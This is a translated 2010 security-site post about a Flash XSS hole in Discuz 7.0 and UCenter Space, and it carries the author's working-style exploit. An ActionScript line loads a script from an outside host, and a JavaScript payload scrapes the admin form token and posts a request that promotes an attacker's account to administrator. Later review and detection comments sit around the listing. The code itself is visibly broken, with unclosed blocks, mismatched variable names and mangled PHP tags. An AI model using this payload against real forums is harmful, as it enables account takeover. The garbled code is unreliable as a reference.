Discuz 7.0.0 Flash XSS: old vulnerabilities, new ideas - vulnerability warning - the black bar safety net

ID MYHACK58:62201026353
Type myhack58
Reporter 佚名
Modified 2010-03-08T00:00:00


Looking at the official DZ website, it has for some time not been possible to upload an SWF file with a .jpg suffix, but as everyone has noticed, the UCenter Space album that ships alongside DZ still lets you upload an SWF file with a .jpg suffix.

So I downloaded the latest versions of DZ 7.0, UCenter and UCenter Space and tested them; the result is that the file can still be uploaded. In other words, there is a CSRF vulnerability, but exploiting it requires a page on the discuz.net domain in which the Flash can be embedded, and ordinary registered users cannot publish posts that embed Flash on the official DZ website.

In addition, here is something for everyone: the script I wrote for the DZ 6.0 universal XSS, which promotes the attacker's own account to administrator.

The first part is the Flash ActionScript; it automatically detects the poster's uid and passes it to the JS file with a .php suffix: getURL("javascript:var re = new RegExp('authorid=(.+)\"',' ig'); var arr = re. exec(document. body. innerHTML); uid = arr[1]; document. all. tags('SCRIPT')[0]. src='http://www.0daynet.com/xss/discuz6.js.php?uid=' + uid;eval();","_self"); Then comes the PHP code that generates the JS, copied from Racle's and slightly changed by me to make it generic: var url="<?= dirname($_SERVER['HTTP_REFERER'])?& gt;/";

// Exploit payload quoted by the advisory, reproduced verbatim as it appears on this page.
// It is written to run inside the victim's browser within the forum's own origin (via the
// Flash/XSS route described above); that is what lets it read the forum's anti-CSRF token,
// which a plain cross-site request could not.
// NOTE(review): the listing as reproduced here is not intact — the blocks opened below are
// never closed, and the object built here is named `request` while the calls further down
// use `xmlHttpReq`.
var request = false;

// Obtain an XHR object: native XMLHttpRequest first, otherwise the legacy IE ActiveX ProgIDs.
if(window. XMLHttpRequest) {

request = new XMLHttpRequest();

if(request. overrideMimeType) {

request. overrideMimeType('text/xml');


} else if(window. ActiveXObject) {

var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP'];

for(var i=0; i<versions. length; i++) {

try {

request = new ActiveXObject(versions);

} catch(e) {} // failures for unavailable ProgIDs are deliberately ignored





// Synchronous GET (third argument false) of the admin panel home page so its HTML can be scraped below.
xmlHttpReq. open("GET", url+"admincp. php? action=home", false);

xmlHttpReq. send(null);

var resource = xmlHttpReq. responseText;

// Positional scrape of the CSRF token: find the literal "formhash" and take the 8 characters
// 17 positions past it. Defender's note: a per-session form token stops cross-origin forgery,
// but script already executing in the page's origin can read it, so the control that matters
// is closing the injection point (here, the SWF-with-image-suffix upload the advisory describes),
// not a stronger token.
var numero = resource. search(/formhash/);

var formhash=encodeURIComponent(resource. substr(numero+17,8));

// Debug alert of the target URL; the uid is substituted server-side by the PHP that emits this script.
alert("admincp. php? action=editgroups&uid=<?=$ _REQUEST['uid']?& gt;");

// Form body: the scraped token plus new group ids. Per the advisory text this moves the target
// uid into the administrator group; that group id 1 means "administrator" is taken from the
// prose, not shown by the code here.
var post="formhash="+formhash+"&amp; groupidnew=1&extgroupidsnew[]=1&editsubmit=%CC%E1%2 0%BD%BB";//structure to carry the data

// NOTE(review): the third argument is false, so this request is synchronous despite the
// "asynchronously" wording in the original trailing comment.
xmlHttpReq. open("POST",url+"admincp. php? action=editgroups&uid=<?=$ _REQUEST['uid']?& gt;",false);//use the POST method to open a connection to the server, asynchronously communication

// NOTE(review): Referer and content-length are request headers that browsers refuse to let page
// script set through setRequestHeader; whether the 2010-era browsers this targeted honoured
// them is not shown on this page. A server-side Referer check is not a reliable control either way.
xmlHttpReq. setRequestHeader("Referer", url);

xmlHttpReq. setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-powerpoint, application/vnd. ms-excel, application/msword, /");

xmlHttpReq. setRequestHeader("content-length",post. length);

xmlHttpReq. setRequestHeader("content-type","application/x-www-form-urlencoded");

// Detection note: server-side this leaves a GET of admincp.php?action=home immediately followed
// by a POST to action=editgroups from the same session — a pairing worth alerting on in admin logs.
xmlHttpReq. send(post);//send data

Also, many people still run DZ6; many of them have applied the patch for that word-insertion vulnerability, but an account can still be set as a backend administrator.